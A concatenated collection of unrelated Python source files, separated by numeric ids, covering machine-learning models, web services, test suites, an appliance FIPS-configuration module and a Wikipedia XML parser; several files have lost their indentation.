w_h2 = shared_normal((n_h1, n_h2), scale=scale)
b_h2 = shared_zeros((n_h2,))
w_h3 = shared_normal((n_h2, n_h3), scale=scale)
b_h3 = shared_zeros((n_h3,))
w_h4 = shared_normal((n_h3, n_h4), scale=scale)
b_h4 = shared_zeros((n_h4,))
w_o = shared_normal((n_h4, n_y), scale=scale)
def batch_norm(h):
m = T.mean(h, axis=0, keepdims=True)
std = T.sqrt(T.var(h, axis=0, keepdims=True) + self.epsilon)
h = (h - m) / std
return h
def model(X, params, p_drop_input, p_drop_hidden):
X_noise = X + gaussian(X.shape, p_drop_input)
h = batch_norm(dropout(rectify(T.dot(X_noise, params.w_h) + params.b_h), p_drop_hidden))
# Dual reconstruction error
phx = T.nnet.sigmoid(T.dot(h, T.dot(h.T, X_noise)) / self.hp.batch_size)
log_phx = T.nnet.binary_crossentropy(phx, X_noise).sum()
h2 = dropout(rectify(T.dot(h, params.w_h2) + params.b_h2), p_drop_hidden)
h3 = batch_norm(dropout(rectify(T.dot(h2, params.w_h3) + params.b_h3), p_drop_hidden))
h4 = dropout(rectify(T.dot(h3, params.w_h4) + params.b_h4), p_drop_hidden)
py_x = softmax(T.dot(h4, params.w_o))
return [py_x, log_phx]
noise_py_x, cost_recon = model(self.X, self.params, 0.2, 0.5)
cost_y2 = -T.sum(self.Y * T.log(noise_py_x))
cost = cost_y2 + cost_recon
pyx, _ = model(self.X, self.params, 0., 0.)
map_pyx = T.argmax(pyx, axis=1)
error_map_pyx = T.sum(T.neq(map_pyx, T.argmax(self.Y, axis=1)))
self.compile(cost, error_map_pyx)
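# Note on the objective above: the total cost adds the label cross-entropy
# (cost_y2) to the "dual" reconstruction term (cost_recon), which reconstructs
# the noisy input through the first hidden layer as
# sigmoid(h . h^T . X_noise / batch_size) and scores it with a binary
# cross-entropy, following the auto-classifier-encoder idea from the docstring.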
|
23499
|
class AveragingBucketUpkeep:
def __init__(self):
self.numer = 0.0
self.denom = 0
def add_cost(self, cost):
self.numer += cost
self.denom += 1
return self.numer / self.denom
def rem_cost(self, cost):
self.numer -= cost
self.denom -= 1
if self.denom == 0:
return 0
return self.numer / self.denom
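# Minimal usage sketch: maintain a running average of bucket costs as items are
# added and removed (the cost values below are arbitrary illustrations).
if __name__ == '__main__':
    upkeep = AveragingBucketUpkeep()
    assert upkeep.add_cost(4.0) == 4.0   # average of [4.0]
    assert upkeep.add_cost(2.0) == 3.0   # average of [4.0, 2.0]
    assert upkeep.rem_cost(4.0) == 2.0   # average of [2.0]
    assert upkeep.rem_cost(2.0) == 0     # empty bucket reports 0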
|
23570
|
from ...app.models import App
from ...webhook.event_types import WebhookEventType
def test_qs_for_event_type(payment_app):
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 1
assert qs[0] == payment_app
def test_qs_for_event_type_no_payment_permissions(payment_app):
payment_app.permissions.first().delete()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_inactive_app(payment_app):
payment_app.is_active = False
payment_app.save()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_no_webhook_event(payment_app):
webhook = payment_app.webhooks.first()
event = webhook.events.filter(event_type=WebhookEventType.PAYMENT_AUTHORIZE).first()
event.delete()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_inactive_webhook(payment_app):
webhook = payment_app.webhooks.first()
webhook.is_active = False
webhook.save()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
|
23605
|
from typing import List
from parser import parse_bytes, split_bytes_from_lines, get_bytes, parse_instruction_set, wrap_parsed_set
from reader import dump_file_hex_with_locs
class Translator:
"""
Class handling file translations from *.mpy to hex dumps and opcodes
"""
def __init__(self, file: str):
"""
Create new translator
:param file: location of the file
"""
self.file = file
def get_file_hex(self):
"""
Get a full hex dump of the file
:return:
"""
return dump_file_hex_with_locs(self.file)
def get_file_hex_at(self, _from: str, _to: str):
"""
Get a byte dump at a specified location
:param _from: from address
:param _to: to address
:return: bytes from address {_from} to address {_to}
"""
return parse_bytes(self.get_file_hex(), _from, _to)
def get_file(self):
"""
Get the file name
:return:
"""
return self.file
def get_magic(self) -> str:
"""
Get the magic number
:return:
"""
return "".join(self.get_all_bytes()[0][:8])
def get_all_bytes(self):
"""
Get all of the bytes
:return: all of the bytes
"""
return get_bytes(self.get_file_hex().split("\n"))
def get_split_bytes(self) -> List[List[str]]:
"""
Get all of the bytes per line
:return: bytes in list form
"""
split = split_bytes_from_lines(self.get_all_bytes())
split[0] = split[0][4:]
return split
def get_bytes_at(self, _from: str, _to: str) -> List[List[str]]:
"""
Get the bytes between the specified locations
:param _from: start address
:param _to: end address
:return: bytes
"""
return split_bytes_from_lines(self.get_file_hex_at(_from, _to))
def get_instruction_set(self) -> List[str]:
"""
Get the file's instruction set
:return: set
"""
bl = self.get_split_bytes()
# offset of 8, start at first BC_BASE_RESERVED
list_with_offset = bl[0][4:]
_bytes = self.__flatten([list_with_offset, bl[1]])
_set = parse_instruction_set(_bytes)
return wrap_parsed_set(_set)
def get_instructions_at(self, _from: str, _to: str) -> List[str]:
"""
Get the instructions between addresses
:param _from: start address
:param _to: end address
:return: instructions
"""
_bytes = self.__flatten(self.get_bytes_at(_from, _to))
_set = parse_instruction_set(_bytes)
return wrap_parsed_set(_set)
def __flatten(self, _list):
# Lambda replaced by def flatten due to E731
return [item for sublist in _list for item in sublist]
|
23607
|
import sys
from ctypes import *
def test_getattr():
class Stuff(Union):
_fields_ = [('x', c_char), ('y', c_int)]
stuff = Stuff()
stuff.y = ord('x') | (ord('z') << 24)
if sys.byteorder == 'little':
assert stuff.x == b'x'
else:
assert stuff.x == b'z'
def test_union_of_structures():
class Stuff(Structure):
_fields_ = [('x', c_int)]
class Stuff2(Structure):
_fields_ = [('x', c_int)]
class UnionofStuff(Union):
_fields_ = [('one', Stuff),
('two', Stuff2)]
u = UnionofStuff()
u.one.x = 3
assert u.two.x == 3
|
23609
|
import json
import boto3 # Amazon S3 client library
s3 = boto3.resource('s3')
dynamodb = boto3.resource('dynamodb')
problems_table = dynamodb.Table('codebreaker-problems')
bucket = s3.Bucket('codebreaker-testdata')
def lambda_handler(event, context):
problemName = event['problemName']
testcaseCount = 0
for obj in bucket.objects.filter(Prefix="{0}/".format(problemName)):
testcaseCount += 1
print(testcaseCount)
problems_table.update_item(
Key = {'problemName':problemName},
        UpdateExpression = 'set #b=:a',
ExpressionAttributeValues={':a':int(testcaseCount/2)},
ExpressionAttributeNames={'#b':'testcaseCount'}
)
return {
'statusCode': 200,
'testcaseCount':testcaseCount
}
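# Example invocation event for the handler above ("sample-problem" is a
# placeholder): {"problemName": "sample-problem"}. The handler counts the
# objects stored under the "sample-problem/" prefix and writes half of that
# count (input/output pairs) back to the codebreaker-problems table as
# testcaseCount.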
|
23614
|
import torch
import torch.nn as nn
import torchvision.models as models
from torch.nn.utils.rnn import pack_padded_sequence as pack
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.autograd import Variable
class EncoderCNN(nn.Module):
def __init__(self, embed_size):
"""Load the pretrained ResNet-152 and replace top fc layer."""
super(EncoderCNN, self).__init__()
resnet = models.resnet152(pretrained=True)
modules = list(resnet.children())[:-1] # delete the last fc layer.
self.resnet = nn.Sequential(*modules)
self.linear = nn.Linear(resnet.fc.in_features, embed_size)
self.bn = nn.BatchNorm1d(embed_size, momentum=0.01)
self.init_weights()
def init_weights(self):
"""Initialize the weights."""
self.linear.weight.data.normal_(0.0, 0.02)
self.linear.bias.data.fill_(0)
def forward(self, images):
"""Extract the image feature vectors."""
features = self.resnet(images)
features = Variable(features.data)
features = features.view(features.size(0), -1)
features = self.bn(self.linear(features))
return features
class LayoutEncoder(nn.Module):
def __init__(self, layout_encoding_size, hidden_size, vocab_size, num_layers):
"""Set the hyper-parameters and build the layers."""
super(LayoutEncoder, self).__init__()
self.label_encoder = nn.Embedding(vocab_size, layout_encoding_size)
self.location_encoder = nn.Linear(4, layout_encoding_size)
self.lstm = nn.LSTM(layout_encoding_size, hidden_size, num_layers, batch_first=True)
self.init_weights()
def init_weights(self):
"""Initialize weights."""
self.label_encoder.weight.data.uniform_(-0.1, 0.1)
self.location_encoder.weight.data.uniform_(-0.1, 0.1)
self.location_encoder.bias.data.fill_(0)
def forward(self, label_seqs, location_seqs, lengths):
# sort label sequences and location sequences in batch dimension according to length
batch_idx = sorted(range(len(lengths)), key=lambda k: lengths[k], reverse=True)
reverse_batch_idx = torch.LongTensor([batch_idx.index(i) for i in range(len(batch_idx))])
lens_sorted = sorted(lengths, reverse=True)
label_seqs_sorted = torch.index_select(label_seqs, 0, torch.LongTensor(batch_idx))
location_seqs_sorted = torch.index_select(location_seqs, 0, torch.LongTensor(batch_idx))
# assert torch.equal(torch.index_select(label_seqs_sorted, 0, reverse_batch_idx), label_seqs)
# assert torch.equal(torch.index_select(location_seqs_sorted, 0, reverse_batch_idx), location_seqs)
if torch.cuda.is_available():
reverse_batch_idx = reverse_batch_idx.cuda()
label_seqs_sorted = label_seqs_sorted.cuda()
location_seqs_sorted = location_seqs_sorted.cuda()
# create Variables
label_seqs_sorted_var = Variable(label_seqs_sorted, requires_grad=False)
location_seqs_sorted_var = Variable(location_seqs_sorted, requires_grad=False)
# encode label sequences
label_encoding = self.label_encoder(label_seqs_sorted_var)
# encode location sequences
location_seqs_sorted_var = location_seqs_sorted_var.view(-1, 4)
location_encoding = self.location_encoder(location_seqs_sorted_var)
location_encoding = location_encoding.view(label_encoding.size(0), -1, location_encoding.size(1))
# layout encoding - batch_size x max_seq_len x embed_size
layout_encoding = label_encoding + location_encoding
packed = pack(layout_encoding, lens_sorted, batch_first=True)
hiddens, _ = self.lstm(packed)
# unpack hiddens and get last hidden vector
hiddens_unpack = unpack(hiddens, batch_first=True)[0] # batch_size x max_seq_len x embed_size
last_hidden_idx = torch.zeros(hiddens_unpack.size(0), 1, hiddens_unpack.size(2)).long()
for i in range(hiddens_unpack.size(0)):
last_hidden_idx[i, 0, :] = lens_sorted[i] - 1
if torch.cuda.is_available():
last_hidden_idx = last_hidden_idx.cuda()
last_hidden = torch.gather(hiddens_unpack, 1, Variable(last_hidden_idx, requires_grad=False)) # batch_size x 1 x embed_size
last_hidden = torch.squeeze(last_hidden, 1) # batch_size x embed_size
# convert back to original batch order
last_hidden = torch.index_select(last_hidden, 0, Variable(reverse_batch_idx, requires_grad=False))
return last_hidden
class DecoderRNN(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers):
"""Set the hyper-parameters and build the layers."""
super(DecoderRNN, self).__init__()
self.embed = nn.Embedding(vocab_size, embed_size)
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first=True)
self.linear = nn.Linear(hidden_size, vocab_size)
self.init_weights()
def init_weights(self):
"""Initialize weights."""
self.embed.weight.data.uniform_(-0.1, 0.1)
self.linear.weight.data.uniform_(-0.1, 0.1)
self.linear.bias.data.fill_(0)
def forward(self, features, captions, lengths):
"""Decode image feature vectors and generates captions."""
embeddings = self.embed(captions)
embeddings = torch.cat((features.unsqueeze(1), embeddings), 1)
packed = pack(embeddings, lengths, batch_first=True)
hiddens, _ = self.lstm(packed)
outputs = self.linear(hiddens[0])
return outputs
def sample(self, features, states=None):
"""Samples captions for given image features (Greedy search)."""
sampled_ids = []
inputs = features.unsqueeze(1)
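        # inputs: (batch_size, 1, embed_size)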
for i in range(20): # maximum sampling length
hiddens, states = self.lstm(inputs, states) # (batch_size, 1, hidden_size),
outputs = self.linear(hiddens.squeeze(1)) # (batch_size, vocab_size)
predicted = outputs.max(1)[1]
sampled_ids.append(predicted)
inputs = self.embed(predicted)
sampled_ids = torch.cat(sampled_ids, 1) # (batch_size, 20)
return sampled_ids.squeeze()
|
23625
|
from torch import nn, optim
import torch
import model
import torch.nn.utils
import utils
import argparse
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
parser = argparse.ArgumentParser(description='training parameters')
parser.add_argument('--n_hid', type=int, default=128,
help='hidden size of recurrent net')
parser.add_argument('--T', type=int, default=100,
help='length of sequences')
parser.add_argument('--max_steps', type=int, default=60000,
help='max learning steps')
parser.add_argument('--log_interval', type=int, default=100,
help='log interval')
parser.add_argument('--batch', type=int, default=50,
help='batch size')
parser.add_argument('--batch_test', type=int, default=1000,
help='size of test set')
parser.add_argument('--lr', type=float, default=2e-2,
help='learning rate')
parser.add_argument('--dt',type=float, default=6e-2,
help='step size <dt> of the coRNN')
parser.add_argument('--gamma',type=float, default=66,
                    help='y control parameter <gamma> of the coRNN')
parser.add_argument('--epsilon',type=float, default = 15,
                    help='z control parameter <epsilon> of the coRNN')
args = parser.parse_args()
n_inp = 2
n_out = 1
model = model.coRNN(n_inp, args.n_hid, n_out, args.dt, args.gamma, args.epsilon).to(device)
objective = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr=args.lr)
def test():
model.eval()
with torch.no_grad():
data, label = utils.get_batch(args.T, args.batch_test)
label = label.unsqueeze(1)
out = model(data.to(device))
loss = objective(out, label.to(device))
return loss.item()
def train():
test_mse = []
for i in range(args.max_steps):
data, label = utils.get_batch(args.T,args.batch)
label = label.unsqueeze(1)
optimizer.zero_grad()
out = model(data.to(device))
loss = objective(out, label.to(device))
loss.backward()
optimizer.step()
        if i % args.log_interval == 0 and i != 0:
mse_error = test()
print('Test MSE: {:.6f}'.format(mse_error))
test_mse.append(mse_error)
model.train()
if __name__ == '__main__':
train()
|
23634
|
import json
import datetime
import requests
from nameko.web.handlers import http
from nameko.timer import timer
from statsd import StatsClient
from circuitbreaker import circuit
class DemoChassisService:
name = "demo_chassis_service"
statsd = StatsClient('localhost', 8125, prefix='simplebank-demo')
@http('GET', '/health')
@statsd.timer('health')
def health(self, _request):
return json.dumps({'ok': datetime.datetime.utcnow().__str__()})
@http('GET', '/external')
@circuit(failure_threshold=5, expected_exception=ConnectionError)
@statsd.timer('external')
def external_request(self, _request):
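        # the circuit breaker opens after 5 consecutive ConnectionErrors and short-circuits further calls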
response = requests.get('https://jsonplaceholder.typicode.com/posts/1')
return json.dumps({'code': response.status_code, 'body': response.text})
@http('GET', '/error')
@circuit(failure_threshold=5, expected_exception=ZeroDivisionError)
@statsd.timer('http_error')
    def error_http_request(self, _request):
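        # deliberately raises ZeroDivisionError so the circuit breaker and statsd timer can be exercised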
return json.dumps({1 / 0})
class HealthCheckService:
name = "health_check_service"
statsd = StatsClient('localhost', 8125, prefix='simplebank-demo')
@timer(interval=10)
@statsd.timer('check_demo_service')
def check_demo_service(self):
response = requests.get('http://0.0.0.0:8000/health')
print("DemoChassisService HEALTH CHECK: status_code {}, response: {}".format(
response.status_code, response.text))
|
23639
|
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
map = Basemap(projection='cyl')
map.drawmapboundary(fill_color='aqua')
map.fillcontinents(color='coral',lake_color='aqua')
map.drawcoastlines()
plt.show()
|
23646
|
import logging
import ibmsecurity.utilities.tools
import ibmsecurity.isam.base.firmware
import time
logger = logging.getLogger(__name__)
requires_model = "Appliance"
def get(isamAppliance, check_mode=False, force=False):
"""
Retrieving the current FIPS Mode configuration
"""
return isamAppliance.invoke_get("Retrieving the current FIPS Mode configuration",
"/fips_cfg", requires_model=requires_model)
def set(isamAppliance, fipsEnabled=True, tlsv10Enabled=True, tlsv11Enabled=False, check_mode=False, force=False):
"""
Updating the FIPS Mode configuration
"""
obj = _check(isamAppliance, fipsEnabled, tlsv10Enabled, tlsv11Enabled)
if force is True or obj['value'] is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True, warnings=obj['warnings'])
else:
return isamAppliance.invoke_put(
"Updating the FIPS Mode configuration",
"/fips_cfg",
{
"fipsEnabled": fipsEnabled,
"tlsv10Enabled": tlsv10Enabled,
"tlsv11Enabled": tlsv11Enabled
},
requires_model=requires_model
)
return isamAppliance.create_return_object(warnings=obj['warnings'])
def restart(isamAppliance, check_mode=False, force=False):
"""
Rebooting and enabling the FIPS Mode configuration
:param isamAppliance:
:param check_mode:
:param force:
:return:
"""
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put(
"Rebooting and enabling the FIPS Mode configuration",
"/fips_cfg/restart",
{}, requires_model=requires_model
)
def restart_and_wait(isamAppliance, wait_time=300, check_freq=5, check_mode=False, force=False):
"""
Restart after FIPS configuration changes
:param isamAppliance:
:param wait_time:
:param check_freq:
:param check_mode:
:param force:
:return:
"""
if isamAppliance.facts['model'] != "Appliance":
return isamAppliance.create_return_object(
warnings="API invoked requires model: {0}, appliance is of deployment model: {1}.".format(
requires_model, isamAppliance.facts['model']))
warnings = []
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
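        # snapshot the firmware info (last_boot times) before restarting so we can detect when the appliance is back up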
firmware = ibmsecurity.isam.base.firmware.get(isamAppliance, check_mode=check_mode, force=force)
ret_obj = restart(isamAppliance)
if ret_obj['rc'] == 0:
sec = 0
# Now check if it is up and running
while 1:
ret_obj = ibmsecurity.isam.base.firmware.get(isamAppliance, check_mode=check_mode, force=force,
ignore_error=True)
# check partition last_boot time
if ret_obj['rc'] == 0 and isinstance(ret_obj['data'], list) and len(ret_obj['data']) > 0 and \
(('last_boot' in ret_obj['data'][0] and ret_obj['data'][0]['last_boot'] != firmware['data'][0][
'last_boot'] and ret_obj['data'][0]['active'] == True) or (
'last_boot' in ret_obj['data'][1] and ret_obj['data'][1]['last_boot'] !=
firmware['data'][1]['last_boot'] and ret_obj['data'][1]['active'] == True)):
logger.info("Server is responding and has a different boot time!")
return isamAppliance.create_return_object(warnings=warnings)
else:
time.sleep(check_freq)
sec += check_freq
logger.debug(
"Server is not responding yet. Waited for {0} secs, next check in {1} secs.".format(sec,
check_freq))
if sec >= wait_time:
warnings.append(
"The FIPS restart not detected or completed, exiting... after {0} seconds".format(sec))
break
return isamAppliance.create_return_object(warnings=warnings)
def _check(isamAppliance, fipsEnabled, tlsv10Enabled, tlsv11Enabled):
obj = {'value': True, 'warnings': ""}
ret_obj = get(isamAppliance)
obj['warnings'] = ret_obj['warnings']
if ret_obj['data']['fipsEnabled'] != fipsEnabled:
logger.info("fipsEnabled change to {0}".format(fipsEnabled))
obj['value'] = False
return obj
if ret_obj['data']['tlsv10Enabled'] != tlsv10Enabled:
logger.info("TLS v1.0 change to {0}".format(tlsv10Enabled))
obj['value'] = False
return obj
if ret_obj['data']['tlsv11Enabled'] != tlsv11Enabled:
logger.info("TLS v1.1 change to {0}".format(tlsv11Enabled))
obj['value'] = False
return obj
return obj
def compare(isamAppliance1, isamAppliance2):
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
|
23680
|
from django.contrib import admin
class ChildrenInline(admin.TabularInline):
sortable_field_name = "order"
class GipsyMenu(admin.ModelAdmin):
inlines = [ChildrenInline]
exclude = ('parent',)
list_display = ['name', 'order']
ordering = ['order']
def get_queryset(self, request):
"""Overrides default queryset to only display parent items"""
query = super(GipsyMenu, self).get_queryset(request)
return query.filter(parent__isnull=True)
|
23714
|
class PaginatorOptions:
def __init__(
self,
page_number: int,
page_size: int,
sort_column: str = None,
sort_descending: bool = None
):
self.sort_column = sort_column
self.sort_descending = sort_descending
self.page_number = page_number
self.page_size = page_size
        assert (page_number is not None and page_size) \
            or (page_number is None and not page_size), \
            'Specify both page_number and page_size or neither'
if not sort_column:
self.sort_column = 'id'
self.sort_descending = True
__all__ = ['PaginatorOptions']
|
23722
|
from typedpy import *
class Person(Structure):
first_name = String()
last_name = String()
age = Integer(minimum=1)
_required = ['first_name', 'last_name']
class Groups(Structure):
groups = Array(items=Person)
_required = ['groups']
# ********************
class Example1(Structure):
people = Array(items=Person)
id = Integer()
i = Integer()
s = String()
m = Map(items=[String(), Person])
groups = Groups
_required = ['groups', 'id', 'm', 'people']
|
23729
|
import textwrap
from contextlib import ExitStack as does_not_raise # noqa: N813
import pytest
from _pytask.mark import Mark
from _pytask.outcomes import Skipped
from _pytask.outcomes import SkippedAncestorFailed
from _pytask.outcomes import SkippedUnchanged
from _pytask.skipping import pytask_execute_task_setup
from pytask import cli
from pytask import main
class DummyClass:
pass
@pytest.mark.end_to_end
def test_skip_unchanged(tmp_path):
source = """
def task_dummy():
pass
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
assert session.execution_reports[0].success
session = main({"paths": tmp_path})
assert isinstance(session.execution_reports[0].exc_info[1], SkippedUnchanged)
@pytest.mark.end_to_end
def test_skip_unchanged_w_dependencies_and_products(tmp_path):
source = """
import pytask
@pytask.mark.depends_on("in.txt")
@pytask.mark.produces("out.txt")
def task_dummy(depends_on, produces):
produces.write_text(depends_on.read_text())
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
tmp_path.joinpath("in.txt").write_text("Original content of in.txt.")
session = main({"paths": tmp_path})
assert session.execution_reports[0].success
assert tmp_path.joinpath("out.txt").read_text() == "Original content of in.txt."
session = main({"paths": tmp_path})
assert isinstance(session.execution_reports[0].exc_info[1], SkippedUnchanged)
assert tmp_path.joinpath("out.txt").read_text() == "Original content of in.txt."
@pytest.mark.end_to_end
def test_skipif_ancestor_failed(tmp_path):
source = """
import pytask
@pytask.mark.produces("out.txt")
def task_first():
assert 0
@pytask.mark.depends_on("out.txt")
def task_second():
pass
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
assert not session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Exception)
assert not session.execution_reports[1].success
assert isinstance(session.execution_reports[1].exc_info[1], SkippedAncestorFailed)
@pytest.mark.end_to_end
def test_if_skip_decorator_is_applied_to_following_tasks(tmp_path):
source = """
import pytask
@pytask.mark.skip
@pytask.mark.produces("out.txt")
def task_first():
assert 0
@pytask.mark.depends_on("out.txt")
def task_second():
pass
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
assert session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Skipped)
assert session.execution_reports[1].success
assert isinstance(session.execution_reports[1].exc_info[1], Skipped)
@pytest.mark.end_to_end
@pytest.mark.parametrize(
"mark_string", ["@pytask.mark.skip", "@pytask.mark.skipif(True, reason='bla')"]
)
def test_skip_if_dependency_is_missing(tmp_path, mark_string):
source = f"""
import pytask
{mark_string}
@pytask.mark.depends_on("in.txt")
def task_first():
assert 0
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
assert session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Skipped)
@pytest.mark.end_to_end
@pytest.mark.parametrize(
"mark_string", ["@pytask.mark.skip", "@pytask.mark.skipif(True, reason='bla')"]
)
def test_skip_if_dependency_is_missing_only_for_one_task(runner, tmp_path, mark_string):
source = f"""
import pytask
{mark_string}
@pytask.mark.depends_on("in.txt")
def task_first():
assert 0
@pytask.mark.depends_on("in.txt")
def task_second():
assert 0
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
result = runner.invoke(cli, [tmp_path.as_posix()])
assert result.exit_code == 4
assert "in.txt" in result.output
assert "task_first" not in result.output
assert "task_second" in result.output
@pytest.mark.end_to_end
def test_if_skipif_decorator_is_applied_skipping(tmp_path):
source = """
import pytask
@pytask.mark.skipif(condition=True, reason="bla")
@pytask.mark.produces("out.txt")
def task_first():
assert False
@pytask.mark.depends_on("out.txt")
def task_second():
assert False
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
node = session.collection_reports[0].node
assert len(node.markers) == 1
assert node.markers[0].name == "skipif"
assert node.markers[0].args == ()
assert node.markers[0].kwargs == {"condition": True, "reason": "bla"}
assert session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Skipped)
assert session.execution_reports[1].success
assert isinstance(session.execution_reports[1].exc_info[1], Skipped)
assert session.execution_reports[0].exc_info[1].args[0] == "bla"
@pytest.mark.end_to_end
def test_if_skipif_decorator_is_applied_execute(tmp_path):
source = """
import pytask
@pytask.mark.skipif(False, reason="bla")
@pytask.mark.produces("out.txt")
def task_first(produces):
with open(produces, "w") as f:
f.write("hello world.")
@pytask.mark.depends_on("out.txt")
def task_second():
pass
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
node = session.collection_reports[0].node
assert len(node.markers) == 1
assert node.markers[0].name == "skipif"
assert node.markers[0].args == (False,)
assert node.markers[0].kwargs == {"reason": "bla"}
assert session.execution_reports[0].success
assert session.execution_reports[0].exc_info is None
assert session.execution_reports[1].success
assert session.execution_reports[1].exc_info is None
@pytest.mark.end_to_end
def test_if_skipif_decorator_is_applied_any_condition_matches(tmp_path):
"""Any condition of skipif has to be True and only their message is shown."""
source = """
import pytask
@pytask.mark.skipif(condition=False, reason="I am fine")
@pytask.mark.skipif(condition=True, reason="No, I am not.")
@pytask.mark.produces("out.txt")
def task_first():
assert False
@pytask.mark.depends_on("out.txt")
def task_second():
assert False
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
node = session.collection_reports[0].node
assert len(node.markers) == 2
assert node.markers[0].name == "skipif"
assert node.markers[0].args == ()
assert node.markers[0].kwargs == {"condition": True, "reason": "No, I am not."}
assert node.markers[1].name == "skipif"
assert node.markers[1].args == ()
assert node.markers[1].kwargs == {"condition": False, "reason": "I am fine"}
assert session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Skipped)
assert session.execution_reports[1].success
assert isinstance(session.execution_reports[1].exc_info[1], Skipped)
assert session.execution_reports[0].exc_info[1].args[0] == "No, I am not."
@pytest.mark.unit
@pytest.mark.parametrize(
("marker_name", "expectation"),
[
("skip_unchanged", pytest.raises(SkippedUnchanged)),
("skip_ancestor_failed", pytest.raises(SkippedAncestorFailed)),
("skip", pytest.raises(Skipped)),
("", does_not_raise()),
],
)
def test_pytask_execute_task_setup(marker_name, expectation):
class Task:
pass
task = Task()
kwargs = {"reason": ""} if marker_name == "skip_ancestor_failed" else {}
task.markers = [Mark(marker_name, (), kwargs)]
with expectation:
pytask_execute_task_setup(task)
|
23731
|
from django.apps import AppConfig
from django.core.checks import Tags, register
from django_version_checks import checks
class DjangoVersionChecksAppConfig(AppConfig):
name = "django_version_checks"
verbose_name = "django-version-checks"
def ready(self) -> None:
register(Tags.compatibility)(checks.check_config)
register(Tags.compatibility)(checks.check_python_version)
register(Tags.database)(checks.check_postgresql_version)
register(Tags.database)(checks.check_mysql_version)
register(Tags.database)(checks.check_sqlite_version)
|
23758
|
from poketype import PokemonTypeIdentifier
from flask import Flask, request, make_response,jsonify
import os
identifier = PokemonTypeIdentifier()  # avoid shadowing the built-in id()
app = Flask(__name__,static_url_path='/static')
@app.route('/findtype',methods=['GET'])
def classify():
poke_name=request.args.get('pokename')
    results = identifier.predict_type(poke_name)
return jsonify({'results':results})
@app.route('/',methods=['GET'])
def root():
return app.send_static_file('index.html')
if __name__ == '__main__':
port = int(os.environ.get('PORT', 8001))
app.run(debug=True,host='0.0.0.0',port=port,use_reloader=False)
|
23771
|
import xml.sax
import re
import os
import json
import time
current_milli_time = lambda: int(round(time.time() * 1000))
RE_LINKS = re.compile(r'\[{2}(.*?)\]{2}', re.DOTALL | re.UNICODE)
IGNORED_NAMESPACES = [
'wikipedia', 'category', 'file', 'portal', 'template',
'mediaWiki', 'user', 'help', 'book', 'draft', 'wikiProject',
'special', 'talk', 'image','module'
]
"""MediaWiki namespaces that ought to be ignored."""
class WikiHandler(xml.sax.ContentHandler):
def __init__(self,title2Id,id2Title,redirects):
self.tag = ""
self.content = ''
self.title = ''
self.id = -1
self.title2Id = title2Id
self.id2Title = id2Title
self.redirects = redirects
self.counter_all = 0
self.attributes = {}
self.n = 0
self.start = current_milli_time()
# Call when an element starts
def startElement(self, tag, attributes):
self.tag = tag
self.attributes = attributes
# Call when an elements ends
def endElement(self, tag):
if tag == 'title':
self.title = self.content.strip()
elif tag == 'id':
self.id = int(self.content)
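            # only the first <id> after a <title> (the page id) is recorded; later ids (revision, contributor) are skipped because the title is already registered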
if self.title not in self.title2Id:
self.title2Id[self.title] = self.id
self.id2Title[self.id] = self.title
self.counter_all += 1
if self.counter_all % 1000 == 0:
diff = current_milli_time() - self.start
print('Pages processed: ' + str(self.counter_all) + ', avg t: ' + str(diff / self.counter_all), end='\r')
elif tag == 'text':
self.n += 1
if not any(self.title.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) and not self.title.lower().startswith('list of'):
self.processArticle()
elif tag == 'redirect' and 'title' in self.attributes:
redirect = self.attributes['title']
if not any(self.title.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) \
and not any(redirect.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) \
and not redirect.lower().startswith('list of') \
and not self.title.lower().startswith('list of'):
self.redirects[self.title] = redirect
self.content = ""
# Call when a character is read
def characters(self, content):
self.content += content
def processArticle(self):
text = self.content.strip()
#self.title2Id[self.title] = self.id
if text.lower().startswith('#redirect'):
match = re.search(RE_LINKS,text)
if match:
redirect = match.group(1).strip()
pos_bar = redirect.find('|')
if pos_bar > -1:
redirect = redirect[:pos_bar]
redirect = redirect.replace('_',' ')
if not any(redirect.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) and not redirect.lower().startswith('list of'):
self.redirects[self.title] = redirect
